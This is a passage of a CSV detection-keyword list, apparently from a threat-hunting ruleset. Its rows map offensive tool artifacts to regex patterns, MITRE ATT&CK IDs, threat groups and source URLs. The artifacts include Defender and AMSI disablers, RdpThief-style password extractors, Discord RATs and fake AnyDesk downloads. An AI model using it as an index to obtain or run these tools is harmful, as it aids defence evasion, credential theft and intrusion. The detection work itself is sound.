"*Disable_Privilege /Process:* /Privilege:*",".{0,1000}Disable_Privilege\s\/Process\:.{0,1000}\s\/Privilege\:.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","N/A","10","1038","201","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z","40950"
"*DisableAllWindowsSoftwareFirewalls*",".{0,1000}DisableAllWindowsSoftwareFirewalls.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to interact with COM objects associated with the Windows software firewall.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EspressoCake/Firewall_Walker_BOF","1","1","N/A","N/A","10","10","103","15","2021-10-10T03:28:27Z","2021-10-09T05:17:10Z","40952"
"*Disable-AMS1.ps1*",".{0,1000}Disable\-AMS1\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","40953"
"*DisableAMSI(*",".{0,1000}DisableAMSI\(.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1071.001 - T1059 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1562.001 - T1070 - T1105 - T1106 - T1027 - T1027.002 - T1057 - T1055 - T1620","TA0011 - TA0002 - TA0005 - TA0008 - TA0004 - TA0007 - TA0003 - TA0006 - TA0010","N/A","Indrik Spider","Exploitation tool","https://github.com/TheWover/donut","1","0","N/A","N/A","N/A","10","3882","667","2024-10-23T12:19:13Z","2019-03-27T23:24:44Z","40954"
"*DisableAntiPhishing*",".{0,1000}DisableAntiPhishing.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","8","4","396","56","2024-09-27T16:43:52Z","2023-02-09T02:08:07Z","40955"
"*DisableAntiPhishing.ps1*",".{0,1000}DisableAntiPhishing\.ps1.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","8","4","396","56","2024-09-27T16:43:52Z","2023-02-09T02:08:07Z","40956"
"*DisableAntivirusProtection.reg*",".{0,1000}DisableAntivirusProtection\.reg.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","1","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","40957"
"*DisableBitdefenderAV.exe*",".{0,1000}DisableBitdefenderAV\.exe.{0,1000}","offensive_tool_keyword","Dispossessor","tool used by Dispossessor ransomware group to remove AV","T1562.001 - T1112 - T1059 - T1036","TA0005 - TA0040","N/A","Dispossessor","Defense Evasion","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","40958"
"*DisableBitdefenderAV-1.bat*",".{0,1000}DisableBitdefenderAV\-1\.bat.{0,1000}","offensive_tool_keyword","Dispossessor","script used by Dispossessor ransomware group to remove AV","T1562.001 - T1112 - T1059 - T1036","TA0005 - TA0040","N/A","Dispossessor","Defense Evasion","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","40959"
"*DisableBitdefenderAV-2.bat*",".{0,1000}DisableBitdefenderAV\-2\.bat.{0,1000}","offensive_tool_keyword","Dispossessor","script used by Dispossessor ransomware group to remove AV","T1562.001 - T1112 - T1059 - T1036","TA0005 - TA0040","N/A","Dispossessor","Defense Evasion","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","40960"
"*DisableBitdefenderAV-3.bat*",".{0,1000}DisableBitdefenderAV\-3\.bat.{0,1000}","offensive_tool_keyword","Dispossessor","script used by Dispossessor ransomware group to remove AV","T1562.001 - T1112 - T1059 - T1036","TA0005 - TA0040","N/A","Dispossessor","Defense Evasion","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","40961"
"*DisableBitdefenderAV-4.bat*",".{0,1000}DisableBitdefenderAV\-4\.bat.{0,1000}","offensive_tool_keyword","Dispossessor","script used by Dispossessor ransomware group to remove AV","T1562.001 - T1112 - T1059 - T1036","TA0005 - TA0040","N/A","Dispossessor","Defense Evasion","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","40962"
"*DisableBitdefenderAV-5.bat*",".{0,1000}DisableBitdefenderAV\-5\.bat.{0,1000}","offensive_tool_keyword","Dispossessor","script used by Dispossessor ransomware group to remove AV","T1562.001 - T1112 - T1059 - T1036","TA0005 - TA0040","N/A","Dispossessor","Defense Evasion","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","40963"
"*DisableBitdefenderAV-6.bat*",".{0,1000}DisableBitdefenderAV\-6\.bat.{0,1000}","offensive_tool_keyword","Dispossessor","script used by Dispossessor ransomware group to remove AV","T1562.001 - T1112 - T1059 - T1036","TA0005 - TA0040","N/A","Dispossessor","Defense Evasion","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","40964"
"*DisableBitdefenderAV-7.bat*",".{0,1000}DisableBitdefenderAV\-7\.bat.{0,1000}","offensive_tool_keyword","Dispossessor","script used by Dispossessor ransomware group to remove AV","T1562.001 - T1112 - T1059 - T1036","TA0005 - TA0040","N/A","Dispossessor","Defense Evasion","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","40965"
"*DisableBitdefenderAV-8.bat*",".{0,1000}DisableBitdefenderAV\-8\.bat.{0,1000}","offensive_tool_keyword","Dispossessor","script used by Dispossessor ransomware group to remove AV","T1562.001 - T1112 - T1059 - T1036","TA0005 - TA0040","N/A","Dispossessor","Defense Evasion","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","40966"
"*DisableBitdefenderAV-9.bat*",".{0,1000}DisableBitdefenderAV\-9\.bat.{0,1000}","offensive_tool_keyword","Dispossessor","script used by Dispossessor ransomware group to remove AV","T1562.001 - T1112 - T1059 - T1036","TA0005 - TA0040","N/A","Dispossessor","Defense Evasion","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","40967"
"*DisableCylance.ps1*",".{0,1000}DisableCylance\.ps1.{0,1000}","offensive_tool_keyword","RandomPS-Scripts","PowerShell wrapper for a Cylance Bypass","T1055 - T1068 - T1562.001","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/xorrior/RandomPS-Scripts","1","1","N/A","N/A","8","4","318","86","2017-12-29T17:16:42Z","2015-02-25T04:52:01Z","40968"
"*DisableDefender.ps1*",".{0,1000}DisableDefender\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","40969"
"*DisableDefenderandSecurityCenterNotifications.reg*",".{0,1000}DisableDefenderandSecurityCenterNotifications\.reg.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","1","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","40970"
"*DisableDefenderPolicies.reg*",".{0,1000}DisableDefenderPolicies\.reg.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","1","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","40971"
"*DisableDevDriveProtection.reg*",".{0,1000}DisableDevDriveProtection\.reg.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","1","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","40972"
"*disableeventvwr/*.ps1*",".{0,1000}disableeventvwr\/.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","cobaltstrike","Aggressor script to integrate Phant0m with Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/p292/Phant0m_cobaltstrike","1","1","N/A","N/A","10","10","27","13","2017-06-08T06:42:18Z","2017-06-08T06:39:07Z","40973"
"*DisableKerberosSigning*",".{0,1000}DisableKerberosSigning.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","40974"
"*DisableLSAProtection.reg*",".{0,1000}DisableLSAProtection\.reg.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","1","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","40976"
"*DisableMailboxAuditing.ps1*",".{0,1000}DisableMailboxAuditing\.ps1.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","8","4","396","56","2024-09-27T16:43:52Z","2023-02-09T02:08:07Z","40977"
"*DisableMaintenanceTaskreportinginSecurityHealthUI.reg*",".{0,1000}DisableMaintenanceTaskreportinginSecurityHealthUI\.reg.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","1","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","40978"
"*DisableMFA.ps1*",".{0,1000}DisableMFA\.ps1.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","8","4","396","56","2024-09-27T16:43:52Z","2023-02-09T02:08:07Z","40979"
"*DisableMicrosoftVulnerabileDriverBlocklist.reg*",".{0,1000}DisableMicrosoftVulnerabileDriverBlocklist\.reg.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","1","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","40980"
"*DisableRealtimeMonitoring $true*",".{0,1000}DisableRealtimeMonitoring\s\$true.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001  -  T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","0","N/A","N/A","10","10","1161","119","2025-02-03T12:03:19Z","2021-02-09T15:54:23Z","40981"
"*DisableSmartScreen.reg*",".{0,1000}DisableSmartScreen\.reg.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","1","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","40982"
"*DisableSpyNetTelemetry.reg*",".{0,1000}DisableSpyNetTelemetry\.reg.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","1","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","40983"
"*DisableSystemMitigations.reg*",".{0,1000}DisableSystemMitigations\.reg.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","1","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","40984"
"*Disable-TamperProtection.cpp*",".{0,1000}Disable\-TamperProtection\.cpp.{0,1000}","offensive_tool_keyword","Disable-TamperProtection","disable TamperProtection and other Defender / MDE components","T1562.001 - T1562.007","TA0005","N/A","N/A","Defense Evasion","https://github.com/AlteredSecurity/Disable-TamperProtection","1","1","N/A","N/A","10","3","208","35","2024-06-06T14:44:59Z","2024-06-05T12:48:56Z","40985"
"*Disable-TamperProtection.exe*",".{0,1000}Disable\-TamperProtection\.exe.{0,1000}","offensive_tool_keyword","Disable-TamperProtection","disable TamperProtection and other Defender / MDE components","T1562.001 - T1562.007","TA0005","N/A","N/A","Defense Evasion","https://github.com/AlteredSecurity/Disable-TamperProtection","1","1","N/A","N/A","10","3","208","35","2024-06-06T14:44:59Z","2024-06-05T12:48:56Z","40986"
"*DisableTamperProtection.reg*",".{0,1000}DisableTamperProtection\.reg.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","1","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","40987"
"*DisableUAC.reg*",".{0,1000}DisableUAC\.reg.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","1","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","40988"
"*DisableVBS.reg*",".{0,1000}DisableVBS\.reg.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","1","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","40989"
"*disableWinDef.cpp*",".{0,1000}disableWinDef\.cpp.{0,1000}","offensive_tool_keyword","WinDefenderKiller","Windows Defender Killer | C++ Code Disabling Permanently Windows Defender using Registry Keys","T1562.001 - T1055.002 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/S12cybersecurity/WinDefenderKiller","1","1","N/A","N/A","10","5","448","67","2023-07-27T11:06:24Z","2023-07-25T10:32:25Z","40990"
"*Disabling ASLR *",".{0,1000}Disabling\sASLR\s.{0,1000}","offensive_tool_keyword","frampton","PE Binary Shellcode Injector - Automated code cave discovery. shellcode injection - ASLR bypass - x86/x64 compatible","T1055 - T1548.002 - T1129 - T1001","TA0002 - TA0003- TA0004 -TA0011","N/A","N/A","Exploitation tool","https://github.com/ins1gn1a/Frampton","1","0","N/A","N/A","N/A","1","75","19","2019-11-24T22:34:48Z","2019-10-29T00:22:14Z","40991"
"*Disabling RDPStrike*",".{0,1000}Disabling\sRDPStrike.{0,1000}","offensive_tool_keyword","RdpStrike","Positional Independent Code to extract clear text password from mstsc.exe using API Hooking via HWBP","T1081 - T1055.011 - T1012 - T1113 - T1040 - T1185","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xEr3bus/RdpStrike","1","0","N/A","N/A","10","3","238","27","2024-06-11T19:40:05Z","2024-06-11T19:31:50Z","40992"
"*Disabling RdpThief*",".{0,1000}Disabling\sRdpThief.{0,1000}","offensive_tool_keyword","RdpThief","Extracting Clear Text Passwords from mstsc.exe using API Hooking.","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/0x09AL/RdpThief","1","0","#content","N/A","10","10","1311","361","2024-07-20T06:58:02Z","2019-11-03T17:54:38Z","40993"
"*discordapp.com/attachments/*/AnyDesk.exe*",".{0,1000}discordapp\.com\/attachments\/.{0,1000}\/AnyDesk\.exe.{0,1000}","offensive_tool_keyword","anydesk","Fake Anydesk distributed by discord - mars stealer","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona - BlackByte - Cactus - Lapsus$ - Black Basta - MONTI - Karakurt - Dispossessor","RMM","https://www.virustotal.com/gui/url/f83616f0f9cd2337ed40e22b0a675a99d58edf004b31645f56f28f020f5e4f46/detection","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","40994"
"*discordapp.com/attachments/*/BOINCPortable_*.exe*",".{0,1000}discordapp\.com\/attachments\/.{0,1000}\/BOINCPortable_.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","BOINC","Fake BOINC software distributed by discord - mars stealer","T1566 - T1587","N/A","N/A","N/A","Malware","https://cyberint.com/wp-content/uploads/2022/02/Mars-Stealer-7.png.webp","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","40995"
"*discordgo.New(""Bot ..."")*",".{0,1000}discordgo\.New\(\""Bot\s\.\.\.\""\).{0,1000}","offensive_tool_keyword","discord-c2","C2 communication with discord","T1102.003 - T1071.001 - T1027.010 - T1105 - T1090.002","TA0011 - TA0010","N/A","N/A","C2","https://github.com/bmdyy/discord-c2","1","0","N/A","N/A","10","10","60","6","2022-12-29T03:05:05Z","2022-12-08T19:10:23Z","40996"
"*Discord-RAT-2.0-discordrat.zip*",".{0,1000}Discord\-RAT\-2\.0\-discordrat\.zip.{0,1000}","offensive_tool_keyword","Discord-RAT-2.0","Discord Remote Administration Tool fully written in c#, stub size of ~75kb with over 40 post exploitations modules","T1059.005 - T1105 - T1569.002 - T1027.001","TA0011 - TA0003 - TA0006 - TA0009 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/moom825/Discord-RAT-2.0","1","1","N/A","N/A","10","10","512","115","2023-11-03T01:15:38Z","2022-07-15T20:09:56Z","40997"
"*Discord-RAT-2.0-master.zip*",".{0,1000}Discord\-RAT\-2\.0\-master\.zip.{0,1000}","offensive_tool_keyword","Discord-RAT-2.0","Discord Remote Administration Tool fully written in c#, stub size of ~75kb with over 40 post exploitations modules","T1059.005 - T1105 - T1569.002 - T1027.001","TA0011 - TA0003 - TA0006 - TA0009 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/moom825/Discord-RAT-2.0","1","1","N/A","N/A","10","10","512","115","2023-11-03T01:15:38Z","2022-07-15T20:09:56Z","40998"
"*Discord-RAT-by-Biscuit-main*",".{0,1000}Discord\-RAT\-by\-Biscuit\-main.{0,1000}","offensive_tool_keyword","Discord-RAT-2.0","Discord Remote Administration Tool fully written in c#, stub size of ~75kb with over 40 post exploitations modules","T1059.005 - T1105 - T1569.002 - T1027.001","TA0011 - TA0003 - TA0006 - TA0009 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/moom825/Discord-RAT-2.0","1","1","N/A","N/A","10","10","512","115","2023-11-03T01:15:38Z","2022-07-15T20:09:56Z","40999"
"*DiscoverBasicHostRecon.ahk*",".{0,1000}DiscoverBasicHostRecon\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","1","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","41000"
"*Discover-PSInterestingServices*",".{0,1000}Discover\-PSInterestingServices.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","41001"
"*Discover-PSMSExchangeServers*",".{0,1000}Discover\-PSMSExchangeServers.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","41002"
